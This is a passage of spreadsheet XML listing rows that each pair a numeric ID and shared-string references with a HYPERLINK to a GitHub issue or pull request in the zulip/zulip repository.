        <f>HYPERLINK("https://github.com/zulip/zulip/issues/17435", "https://github.com/zulip/zulip/issues/17435")</f>
        <v>https://github.com/zulip/zulip/issues/17435</v>
      </c>
    </row>
    <row r="257" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A257">
        <v>455</v>
      </c>
      <c r="B257" t="s">
        <v>29</v>
      </c>
      <c r="C257" t="s">
        <v>282</v>
      </c>
      <c r="D257" t="s">
        <v>162</v>
      </c>
      <c r="E257" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/17441", "https://github.com/zulip/zulip/issues/17441")</f>
        <v>https://github.com/zulip/zulip/issues/17441</v>
      </c>
    </row>
    <row r="258" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A258">
        <v>456</v>
      </c>
      <c r="B258" t="s">
        <v>283</v>
      </c>
      <c r="C258" t="s">
        <v>284</v>
      </c>
      <c r="D258" t="s">
        <v>162</v>
      </c>
      <c r="E258" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/17630", "https://github.com/zulip/zulip/pull/17630")</f>
        <v>https://github.com/zulip/zulip/pull/17630</v>
      </c>
    </row>
    <row r="259" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A259">
        <v>457</v>
      </c>
      <c r="B259" t="s">
        <v>82</v>
      </c>
      <c r="C259" t="s">
        <v>285</v>
      </c>
      <c r="D259" t="s">
        <v>162</v>
      </c>
      <c r="E259" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/18157", "https://github.com/zulip/zulip/pull/18157")</f>
        <v>https://github.com/zulip/zulip/pull/18157</v>
      </c>
    </row>
    <row r="260" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A260">
        <v>458</v>
      </c>
      <c r="B260" t="s">
        <v>42</v>
      </c>
      <c r="C260" t="s">
        <v>286</v>
      </c>
      <c r="D260" t="s">
        <v>162</v>
      </c>
      <c r="E260" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/18827", "https://github.com/zulip/zulip/pull/18827")</f>
        <v>https://github.com/zulip/zulip/pull/18827</v>
      </c>
    </row>
    <row r="261" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A261">
        <v>459</v>
      </c>
      <c r="B261" t="s">
        <v>53</v>
      </c>
      <c r="C261" t="s">
        <v>287</v>
      </c>
      <c r="D261" t="s">
        <v>162</v>
      </c>
      <c r="E261" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/19278", "https://github.com/zulip/zulip/issues/19278")</f>
        <v>https://github.com/zulip/zulip/issues/19278</v>
      </c>
    </row>
    <row r="262" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A262">
        <v>460</v>
      </c>
      <c r="B262" t="s">
        <v>17</v>
      </c>
      <c r="C262" t="s">
        <v>287</v>
      </c>
      <c r="D262" t="s">
        <v>162</v>
      </c>
      <c r="E262" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/19278", "https://github.com/zulip/zulip/issues/19278")</f>
        <v>https://github.com/zulip/zulip/issues/19278</v>
      </c>
    </row>
    <row r="263" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A263">
        <v>461</v>
      </c>
      <c r="B263" t="s">
        <v>8</v>
      </c>
      <c r="C263" t="s">
        <v>288</v>
      </c>
      <c r="D263" t="s">
        <v>162</v>
      </c>
      <c r="E263" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/19282", "https://github.com/zulip/zulip/pull/19282")</f>
        <v>https://github.com/zulip/zulip/pull/19282</v>
      </c>
    </row>
    <row r="264" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A264">
        <v>462</v>
      </c>
      <c r="B264" t="s">
        <v>17</v>
      </c>
      <c r="C264" t="s">
        <v>289</v>
      </c>
      <c r="D264" t="s">
        <v>162</v>
      </c>
      <c r="E264" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/19287", "https://github.com/zulip/zulip/issues/19287")</f>
        <v>https://github.com/zulip/zulip/issues/19287</v>
      </c>
    </row>
    <row r="265" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A265">
        <v>463</v>
      </c>
      <c r="B265" t="s">
        <v>223</v>
      </c>
      <c r="C265" t="s">
        <v>290</v>
      </c>
      <c r="D265" t="s">
        <v>162</v>
      </c>
      <c r="E265" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/19319", "https://github.com/zulip/zulip/pull/19319")</f>
        <v>https://github.com/zulip/zulip/pull/19319</v>
      </c>
    </row>
    <row r="266" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A266">
        <v>464</v>
      </c>
      <c r="B266" t="s">
        <v>126</v>
      </c>
      <c r="C266" t="s">
        <v>291</v>
      </c>
      <c r="D266" t="s">
        <v>162</v>
      </c>
      <c r="E266" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/19382", "https://github.com/zulip/zulip/pull/19382")</f>
        <v>https://github.com/zulip/zulip/pull/19382</v>
      </c>
    </row>
    <row r="267" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A267">
        <v>465</v>
      </c>
      <c r="B267" t="s">
        <v>223</v>
      </c>
      <c r="C267" t="s">
        <v>292</v>
      </c>
      <c r="D267" t="s">
        <v>162</v>
      </c>
      <c r="E267" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/19513", "https://github.com/zulip/zulip/pull/19513")</f>
        <v>https://github.com/zulip/zulip/pull/19513</v>
      </c>
    </row>
    <row r="268" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A268">
        <v>466</v>
      </c>
      <c r="B268" t="s">
        <v>8</v>
      </c>
      <c r="C268" t="s">
        <v>292</v>
      </c>
      <c r="D268" t="s">
        <v>162</v>
      </c>
      <c r="E268" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/19513", "https://github.com/zulip/zulip/pull/19513")</f>
        <v>https://github.com/zulip/zulip/pull/19513</v>
      </c>
    </row>
    <row r="269" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A269">
        <v>469</v>
      </c>
      <c r="B269" t="s">
        <v>223</v>
      </c>
      <c r="C269" t="s">
        <v>293</v>
      </c>
      <c r="D269" t="s">
        <v>162</v>
      </c>
      <c r="E269" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/19840", "https://github.com/zulip/zulip/issues/19840")</f>
        <v>https://github.com/zulip/zulip/issues/19840</v>
      </c>
    </row>
    <row r="270" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A270">
        <v>470</v>
      </c>
      <c r="B270" t="s">
        <v>8</v>
      </c>
      <c r="C270" t="s">
        <v>293</v>
      </c>
      <c r="D270" t="s">
        <v>162</v>
      </c>
      <c r="E270" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/19840", "https://github.com/zulip/zulip/issues/19840")</f>
        <v>https://github.com/zulip/zulip/issues/19840</v>
      </c>
    </row>
    <row r="271" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A271">
        <v>471</v>
      </c>
      <c r="B271" t="s">
        <v>53</v>
      </c>
      <c r="C271" t="s">
        <v>293</v>
      </c>
      <c r="D271" t="s">
        <v>162</v>
      </c>
      <c r="E271" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/19840", "https://github.com/zulip/zulip/issues/19840")</f>
        <v>https://github.com/zulip/zulip/issues/19840</v>
      </c>
    </row>
    <row r="272" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A272">
        <v>472</v>
      </c>
      <c r="B272" t="s">
        <v>11</v>
      </c>
      <c r="C272" t="s">
        <v>294</v>
      </c>
      <c r="D272" t="s">
        <v>162</v>
      </c>
      <c r="E272" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/20081", "https://github.com/zulip/zulip/issues/20081")</f>
        <v>https://github.com/zulip/zulip/issues/20081</v>
      </c>
    </row>
    <row r="273" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A273">
        <v>473</v>
      </c>
      <c r="B273" t="s">
        <v>223</v>
      </c>
      <c r="C273" t="s">
        <v>295</v>
      </c>
      <c r="D273" t="s">
        <v>162</v>
      </c>
      <c r="E273" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/20136", "https://github.com/zulip/zulip/pull/20136")</f>
        <v>https://github.com/zulip/zulip/pull/20136</v>
      </c>
    </row>
    <row r="274" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A274">
        <v>478</v>
      </c>
      <c r="B274" t="s">
        <v>17</v>
      </c>
      <c r="C274" t="s">
        <v>296</v>
      </c>
      <c r="D274" t="s">
        <v>162</v>
      </c>
      <c r="E274" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/20157", "https://github.com/zulip/zulip/pull/20157")</f>
        <v>https://github.com/zulip/zulip/pull/20157</v>
      </c>
    </row>
    <row r="275" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A275">
        <v>479</v>
      </c>
      <c r="B275" t="s">
        <v>29</v>
      </c>
      <c r="C275" t="s">
        <v>297</v>
      </c>
      <c r="D275" t="s">
        <v>162</v>
      </c>
      <c r="E275" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/20175", "https://github.com/zulip/zulip/issues/20175")</f>
        <v>https://github.com/zulip/zulip/issues/20175</v>
      </c>
    </row>
    <row r="276" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A276">
        <v>480</v>
      </c>
      <c r="B276" t="s">
        <v>17</v>
      </c>
      <c r="C276" t="s">
        <v>298</v>
      </c>
      <c r="D276" t="s">
        <v>162</v>
      </c>
      <c r="E276" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/20330", "https://github.com/zulip/zulip/pull/20330")</f>
        <v>https://github.com/zulip/zulip/pull/20330</v>
      </c>
    </row>
    <row r="277" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A277">
        <v>481</v>
      </c>
      <c r="B277" t="s">
        <v>29</v>
      </c>
      <c r="C277" t="s">
        <v>299</v>
      </c>
      <c r="D277" t="s">
        <v>162</v>
      </c>
      <c r="E277" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/20532", "https://github.com/zulip/zulip/issues/20532")</f>
        <v>https://github.com/zulip/zulip/issues/20532</v>
      </c>
    </row>
    <row r="278" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A278">
        <v>482</v>
      </c>
      <c r="B278" t="s">
        <v>8</v>
      </c>
      <c r="C278" t="s">
        <v>300</v>
      </c>
      <c r="D278" t="s">
        <v>162</v>
      </c>
      <c r="E278" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/20842", "https://github.com/zulip/zulip/pull/20842")</f>
        <v>https://github.com/zulip/zulip/pull/20842</v>
      </c>
    </row>
    <row r="279" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A279">
        <v>485</v>
      </c>
      <c r="B279" t="s">
        <v>29</v>
      </c>
      <c r="C279" t="s">
        <v>301</v>
      </c>
      <c r="D279" t="s">
        <v>162</v>
      </c>
      <c r="E279" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/20920", "https://github.com/zulip/zulip/issues/20920")</f>
        <v>https://github.com/zulip/zulip/issues/20920</v>
      </c>
    </row>
    <row r="280" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A280">
        <v>486</v>
      </c>
      <c r="B280" t="s">
        <v>53</v>
      </c>
      <c r="C280" t="s">
        <v>302</v>
      </c>
      <c r="D280" t="s">
        <v>162</v>
      </c>
      <c r="E280" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/20928", "https://github.com/zulip/zulip/pull/20928")</f>
        <v>https://github.com/zulip/zulip/pull/20928</v>
      </c>
    </row>
    <row r="281" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A281">
        <v>487</v>
      </c>
      <c r="B281" t="s">
        <v>29</v>
      </c>
      <c r="C281" t="s">
        <v>303</v>
      </c>
      <c r="D281" t="s">
        <v>162</v>
      </c>
      <c r="E281" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/21025", "https://github.com/zulip/zulip/pull/21025")</f>
        <v>https://github.com/zulip/zulip/pull/21025</v>
      </c>
    </row>
    <row r="282" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A282">
        <v>488</v>
      </c>
      <c r="B282" t="s">
        <v>42</v>
      </c>
      <c r="C282" t="s">
        <v>304</v>
      </c>
      <c r="D282" t="s">
        <v>162</v>
      </c>
      <c r="E282" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/21291", "https://github.com/zulip/zulip/pull/21291")</f>
        <v>https://github.com/zulip/zulip/pull/21291</v>
      </c>
    </row>
    <row r="283" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A283">
        <v>489</v>
      </c>
      <c r="B283" t="s">
        <v>42</v>
      </c>
      <c r="C283" t="s">
        <v>305</v>
      </c>
      <c r="D283" t="s">
        <v>162</v>
      </c>
      <c r="E283" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/21439", "https://github.com/zulip/zulip/issues/21439")</f>
        <v>https://github.com/zulip/zulip/issues/21439</v>
      </c>
    </row>
    <row r="284" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A284">
        <v>490</v>
      </c>
      <c r="B284" t="s">
        <v>29</v>
      </c>
      <c r="C284" t="s">
        <v>306</v>
      </c>
      <c r="D284" t="s">
        <v>162</v>
      </c>
      <c r="E284" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/21528", "https://github.com/zulip/zulip/issues/21528")</f>
        <v>https://github.com/zulip/zulip/issues/21528</v>
      </c>
    </row>
    <row r="285" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A285">
        <v>491</v>
      </c>
      <c r="B285" t="s">
        <v>53</v>
      </c>
      <c r="C285" t="s">
        <v>307</v>
      </c>
      <c r="D285" t="s">
        <v>162</v>
      </c>
      <c r="E285" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/21544", "https://github.com/zulip/zulip/issues/21544")</f>
        <v>https://github.com/zulip/zulip/issues/21544</v>
      </c>
    </row>
    <row r="286" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A286">
        <v>492</v>
      </c>
      <c r="B286" t="s">
        <v>8</v>
      </c>
      <c r="C286" t="s">
        <v>308</v>
      </c>
      <c r="D286" t="s">
        <v>162</v>
      </c>
      <c r="E286" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/21578", "https://github.com/zulip/zulip/pull/21578")</f>
        <v>https://github.com/zulip/zulip/pull/21578</v>
      </c>
    </row>
    <row r="287" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A287">
        <v>493</v>
      </c>
      <c r="B287" t="s">
        <v>29</v>
      </c>
      <c r="C287" t="s">
        <v>309</v>
      </c>
      <c r="D287" t="s">
        <v>162</v>
      </c>
      <c r="E287" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/21596", "https://github.com/zulip/zulip/issues/21596")</f>
        <v>https://github.com/zulip/zulip/issues/21596</v>
      </c>
    </row>
    <row r="288" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A288">
        <v>495</v>
      </c>
      <c r="B288" t="s">
        <v>8</v>
      </c>
      <c r="C288" t="s">
        <v>310</v>
      </c>
      <c r="D288" t="s">
        <v>162</v>
      </c>
      <c r="E288" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/22715", "https://github.com/zulip/zulip/pull/22715")</f>
        <v>https://github.com/zulip/zulip/pull/22715</v>
      </c>
    </row>
    <row r="289" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A289">
        <v>497</v>
      </c>
      <c r="B289" t="s">
        <v>311</v>
      </c>
      <c r="C289" t="s">
        <v>312</v>
      </c>
      <c r="D289" t="s">
        <v>162</v>
      </c>
      <c r="E289" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/23268", "https://github.com/zulip/zulip/pull/23268")</f>
        <v>https://github.com/zulip/zulip/pull/23268</v>
      </c>
    </row>
    <row r="290" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A290">
        <v>498</v>
      </c>
      <c r="B290" t="s">
        <v>29</v>
      </c>
      <c r="C290" t="s">
        <v>313</v>
      </c>
      <c r="D290" t="s">
        <v>162</v>
      </c>
      <c r="E290" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/23359", "https://github.com/zulip/zulip/issues/23359")</f>
        <v>https://github.com/zulip/zulip/issues/23359</v>
      </c>
    </row>
    <row r="291" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A291">
        <v>501</v>
      </c>
      <c r="B291" t="s">
        <v>126</v>
      </c>
      <c r="C291" t="s">
        <v>314</v>
      </c>
      <c r="D291" t="s">
        <v>162</v>
      </c>
      <c r="E291" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/23438", "https://github.com/zulip/zulip/issues/23438")</f>
        <v>https://github.com/zulip/zulip/issues/23438</v>
      </c>
    </row>
    <row r="292" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A292">
        <v>502</v>
      </c>
      <c r="B292" t="s">
        <v>42</v>
      </c>
      <c r="C292" t="s">
        <v>315</v>
      </c>
      <c r="D292" t="s">
        <v>162</v>
      </c>
      <c r="E292" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/23501", "https://github.com/zulip/zulip/issues/23501")</f>
        <v>https://github.com/zulip/zulip/issues/23501</v>
      </c>
    </row>
    <row r="293" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A293">
        <v>503</v>
      </c>
      <c r="B293" t="s">
        <v>17</v>
      </c>
      <c r="C293" t="s">
        <v>316</v>
      </c>
      <c r="D293" t="s">
        <v>162</v>
      </c>
      <c r="E293" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/23505", "https://github.com/zulip/zulip/pull/23505")</f>
        <v>https://github.com/zulip/zulip/pull/23505</v>
      </c>
    </row>
    <row r="294" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A294">
        <v>505</v>
      </c>
      <c r="B294" t="s">
        <v>17</v>
      </c>
      <c r="C294" t="s">
        <v>317</v>
      </c>
      <c r="D294" t="s">
        <v>162</v>
      </c>
      <c r="E294" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/23760", "https://github.com/zulip/zulip/pull/23760")</f>
        <v>https://github.com/zulip/zulip/pull/23760</v>
      </c>
    </row>
    <row r="295" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A295">
        <v>506</v>
      </c>
      <c r="B295" t="s">
        <v>318</v>
      </c>
      <c r="C295" t="s">
        <v>319</v>
      </c>
      <c r="D295" t="s">
        <v>162</v>
      </c>
      <c r="E295" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/23813", "https://github.com/zulip/zulip/pull/23813")</f>
        <v>https://github.com/zulip/zulip/pull/23813</v>
      </c>
    </row>
    <row r="296" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A296">
        <v>507</v>
      </c>
      <c r="B296" t="s">
        <v>8</v>
      </c>
      <c r="C296" t="s">
        <v>320</v>
      </c>
      <c r="D296" t="s">
        <v>162</v>
      </c>
      <c r="E296" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/24176", "https://github.com/zulip/zulip/pull/24176")</f>
        <v>https://github.com/zulip/zulip/pull/24176</v>
      </c>
    </row>
    <row r="297" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A297">
        <v>508</v>
      </c>
      <c r="B297" t="s">
        <v>126</v>
      </c>
      <c r="C297" t="s">
        <v>320</v>
      </c>
      <c r="D297" t="s">
        <v>162</v>
      </c>
      <c r="E297" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/24176", "https://github.com/zulip/zulip/pull/24176")</f>
        <v>https://github.com/zulip/zulip/pull/24176</v>
      </c>
    </row>
    <row r="298" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A298">
        <v>510</v>
      </c>
      <c r="B298" t="s">
        <v>48</v>
      </c>
      <c r="C298" t="s">
        <v>321</v>
      </c>
      <c r="D298" t="s">
        <v>162</v>
      </c>
      <c r="E298" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/24176", "https://github.com/zulip/zulip/pull/24176")</f>
        <v>https://github.com/zulip/zulip/pull/24176</v>
      </c>
    </row>
    <row r="299" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A299">
        <v>512</v>
      </c>
      <c r="B299" t="s">
        <v>126</v>
      </c>
      <c r="C299" t="s">
        <v>322</v>
      </c>
      <c r="D299" t="s">
        <v>162</v>
      </c>
      <c r="E299" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/24231", "https://github.com/zulip/zulip/pull/24231")</f>
        <v>https://github.com/zulip/zulip/pull/24231</v>
      </c>
    </row>
    <row r="300" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A300">
        <v>513</v>
      </c>
      <c r="B300" t="s">
        <v>17</v>
      </c>
      <c r="C300" t="s">
        <v>322</v>
      </c>
      <c r="D300" t="s">
        <v>162</v>
      </c>
      <c r="E300" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/24231", "https://github.com/zulip/zulip/pull/24231")</f>
        <v>https://github.com/zulip/zulip/pull/24231</v>
      </c>
    </row>
    <row r="301" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A301">
        <v>517</v>
      </c>
      <c r="B301" t="s">
        <v>213</v>
      </c>
      <c r="C301" t="s">
        <v>323</v>
      </c>
      <c r="D301" t="s">
        <v>162</v>
      </c>
      <c r="E301" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/24242", "https://github.com/zulip/zulip/issues/24242")</f>
        <v>https://github.com/zulip/zulip/issues/24242</v>
      </c>
    </row>
    <row r="302" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A302">
        <v>521</v>
      </c>
      <c r="B302" t="s">
        <v>29</v>
      </c>
      <c r="C302" t="s">
        <v>324</v>
      </c>
      <c r="D302" t="s">
        <v>162</v>
      </c>
      <c r="E302" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/25076", "https://github.com/zulip/zulip/issues/25076")</f>
        <v>https://github.com/zulip/zulip/issues/25076</v>
      </c>
    </row>
    <row r="303" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A303">
        <v>522</v>
      </c>
      <c r="B303" t="s">
        <v>29</v>
      </c>
      <c r="C303" t="s">
        <v>325</v>
      </c>
      <c r="D303" t="s">
        <v>162</v>
      </c>
      <c r="E303" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/25447", "https://github.com/zulip/zulip/issues/25447")</f>
        <v>https://github.com/zulip/zulip/issues/25447</v>
      </c>
    </row>
    <row r="304" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A304">
        <v>523</v>
      </c>
      <c r="B304" t="s">
        <v>42</v>
      </c>
      <c r="C304" t="s">
        <v>326</v>
      </c>
      <c r="D304" t="s">
        <v>162</v>
      </c>
      <c r="E304" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/26116", "https://github.com/zulip/zulip/pull/26116")</f>
        <v>https://github.com/zulip/zulip/pull/26116</v>
      </c>
    </row>
    <row r="305" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A305">
        <v>526</v>
      </c>
      <c r="B305" t="s">
        <v>327</v>
      </c>
      <c r="C305" t="s">
        <v>328</v>
      </c>
      <c r="D305" t="s">
        <v>162</v>
      </c>
      <c r="E305" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/27044", "https://github.com/zulip/zulip/pull/27044")</f>
        <v>https://github.com/zulip/zulip/pull/27044</v>
      </c>
    </row>
    <row r="306" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A306">
        <v>533</v>
      </c>
      <c r="B306" t="s">
        <v>126</v>
      </c>
      <c r="C306" t="s">
        <v>329</v>
      </c>
      <c r="D306" t="s">
        <v>162</v>
      </c>
      <c r="E306" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/27336", "https://github.com/zulip/zulip/issues/27336")</f>
        <v>https://github.com/zulip/zulip/issues/27336</v>
      </c>
    </row>
    <row r="307" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A307">
        <v>534</v>
      </c>
      <c r="B307" t="s">
        <v>17</v>
      </c>
      <c r="C307" t="s">
        <v>329</v>
      </c>
      <c r="D307" t="s">
        <v>162</v>
      </c>
      <c r="E307" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/27336", "https://github.com/zulip/zulip/issues/27336")</f>
        <v>https://github.com/zulip/zulip/issues/27336</v>
      </c>
    </row>
    <row r="308" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A308">
        <v>538</v>
      </c>
      <c r="B308" t="s">
        <v>42</v>
      </c>
      <c r="C308" t="s">
        <v>330</v>
      </c>
      <c r="D308" t="s">
        <v>162</v>
      </c>
      <c r="E308" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/28803", "https://github.com/zulip/zulip/issues/28803")</f>
        <v>https://github.com/zulip/zulip/issues/28803</v>
      </c>
    </row>
    <row r="309" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A309">
        <v>539</v>
      </c>
      <c r="B309" t="s">
        <v>8</v>
      </c>
      <c r="C309" t="s">
        <v>331</v>
      </c>
      <c r="D309" t="s">
        <v>162</v>
      </c>
      <c r="E309" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/28807", "https://github.com/zulip/zulip/issues/28807")</f>
        <v>https://github.com/zulip/zulip/issues/28807</v>
      </c>
    </row>
    <row r="310" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A310">
        <v>541</v>
      </c>
      <c r="B310" t="s">
        <v>311</v>
      </c>
      <c r="C310" t="s">
        <v>331</v>
      </c>
      <c r="D310" t="s">
        <v>162</v>
      </c>
      <c r="E310" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/28807", "https://github.com/zulip/zulip/issues/28807")</f>
        <v>https://github.com/zulip/zulip/issues/28807</v>
      </c>
    </row>
    <row r="311" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A311">
        <v>542</v>
      </c>
      <c r="B311" t="s">
        <v>17</v>
      </c>
      <c r="C311" t="s">
        <v>332</v>
      </c>
      <c r="D311" t="s">
        <v>162</v>
      </c>
      <c r="E311" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/28809", "https://github.com/zulip/zulip/pull/28809")</f>
        <v>https://github.com/zulip/zulip/pull/28809</v>
      </c>
    </row>
    <row r="312" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A312">
        <v>543</v>
      </c>
      <c r="B312" t="s">
        <v>53</v>
      </c>
      <c r="C312" t="s">
        <v>332</v>
      </c>
      <c r="D312" t="s">
        <v>162</v>
      </c>
      <c r="E312" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/28809", "https://github.com/zulip/zulip/pull/28809")</f>
        <v>https://github.com/zulip/zulip/pull/28809</v>
      </c>
    </row>
    <row r="313" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A313">
        <v>544</v>
      </c>
      <c r="B313" t="s">
        <v>333</v>
      </c>
      <c r="C313" t="s">
        <v>334</v>
      </c>
      <c r="D313" t="s">
        <v>162</v>
      </c>
      <c r="E313" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/28990", "https://github.com/zulip/zulip/pull/28990")</f>
        <v>https://github.com/zulip/zulip/pull/28990</v>
      </c>
    </row>
    <row r="314" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A314">
        <v>545</v>
      </c>
      <c r="B314" t="s">
        <v>17</v>
      </c>
      <c r="C314" t="s">
        <v>335</v>
      </c>
      <c r="D314" t="s">
        <v>162</v>
      </c>
      <c r="E314" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/29071", "https://github.com/zulip/zulip/pull/29071")</f>
        <v>https://github.com/zulip/zulip/pull/29071</v>
      </c>
    </row>
    <row r="315" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A315">
        <v>546</v>
      </c>
      <c r="B315" t="s">
        <v>29</v>
      </c>
      <c r="C315" t="s">
        <v>336</v>
      </c>
      <c r="D315" t="s">
        <v>162</v>
      </c>
      <c r="E315" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/29110", "https://github.com/zulip/zulip/issues/29110")</f>
        <v>https://github.com/zulip/zulip/issues/29110</v>
      </c>
    </row>
    <row r="316" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A316">
        <v>551</v>
      </c>
      <c r="B316" t="s">
        <v>29</v>
      </c>
      <c r="C316" t="s">
        <v>337</v>
      </c>
      <c r="D316" t="s">
        <v>162</v>
      </c>
      <c r="E316" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/30351", "https://github.com/zulip/zulip/issues/30351")</f>
        <v>https://github.com/zulip/zulip/issues/30351</v>
      </c>
    </row>
    <row r="317" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A317">
        <v>552</v>
      </c>
      <c r="B317" t="s">
        <v>223</v>
      </c>
      <c r="C317" t="s">
        <v>338</v>
      </c>
      <c r="D317" t="s">
        <v>162</v>
      </c>
      <c r="E317" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/30446", "https://github.com/zulip/zulip/pull/30446")</f>
        <v>https://github.com/zulip/zulip/pull/30446</v>
      </c>
    </row>
    <row r="318" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A318">
        <v>553</v>
      </c>
      <c r="B318" t="s">
        <v>278</v>
      </c>
      <c r="C318" t="s">
        <v>338</v>
      </c>
      <c r="D318" t="s">
        <v>162</v>
      </c>
      <c r="E318" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/30446", "https://github.com/zulip/zulip/pull/30446")</f>
